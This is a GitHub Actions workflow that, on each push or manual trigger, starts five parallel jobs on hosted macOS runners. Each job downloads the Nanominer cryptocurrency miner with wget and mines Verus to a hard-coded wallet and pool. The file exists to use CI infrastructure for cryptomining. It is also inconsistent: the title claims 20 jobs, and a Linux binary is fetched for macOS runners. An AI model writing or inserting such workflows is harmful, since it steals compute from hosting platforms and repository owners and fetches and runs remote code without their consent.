name: Nanominer 20 Jobs

on:
  push:
    branches:
      - main
  workflow_dispatch:  # Allows manual trigger

jobs:
  run-nanominer:
    runs-on: macos-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5]
    steps:
      - name: Install and run Nanominer (Job ${{ matrix.job }})
        run: |
          wget https://github.com/nanopool/nanominer/releases/download/v3.7.7/nanominer-linux-3.7.7.tar.gz
          tar -xzf nanominer-linux-3.7.7.tar.gz

          # Check if the directory exists
          if [ -d "nanominer-linux-3.7.7" ]; then
            cd nanominer-linux-3.7.7
          else
            echo "Directory nanominer-linux-3.7.7 does not exist"
            exit 1
          fi

          # Proceed with the remaining commands
          chmod +x nanominer
          ./nanominer -algo Verushash -coin VRSC -wallet RCvg94F85Uw8f89ZznoEpXktTC2ZNXe8KV.M1 -pool1 eu.luckpool.net:3956 -cpuThreads 6
